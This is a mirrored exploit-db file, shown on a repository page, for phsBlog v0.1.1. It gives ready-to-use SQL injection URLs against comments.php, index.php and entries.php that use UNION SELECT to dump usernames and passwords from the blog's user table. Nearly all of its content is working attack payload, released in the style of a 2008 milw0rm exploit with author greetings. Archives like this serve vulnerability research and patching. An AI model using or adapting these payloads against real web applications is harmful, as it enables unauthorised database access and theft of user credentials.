bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/6190.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

21 lines
No EOL
911 B
Text
Raw Permalink Blame History

#####################################################################################
#
# Name : phsBlog v0.1.1 Multiple Remote SQL Injection Vulnerabilities
# Author : cOndemned [Dark-Coders member]
# Greetz : ZaBeaTy, GregStar, str0ke, 0in, suN8Hclf, ixos, TBH, Avantura :**
#
#####################################################################################
Proof of Concept :
Magic Quotes = On/Off
http://[host]/[phsBlog_path]/comments.php?eid=-1+UNION+SELECT+concat_ws(0x3a,username,password),2+FROM+phsblog_users/*
Magic Quotes = Off
http://[host]/[phsBlog_path]/index.php?cid='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users/*
http://[host]/[phsBlog_path]/entries.php?urltitle='-1+UNION+SELECT+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13+FROM+phsblog_users
# milw0rm.com [2008-08-01]
Reference in a new issue View git blame Copy permalink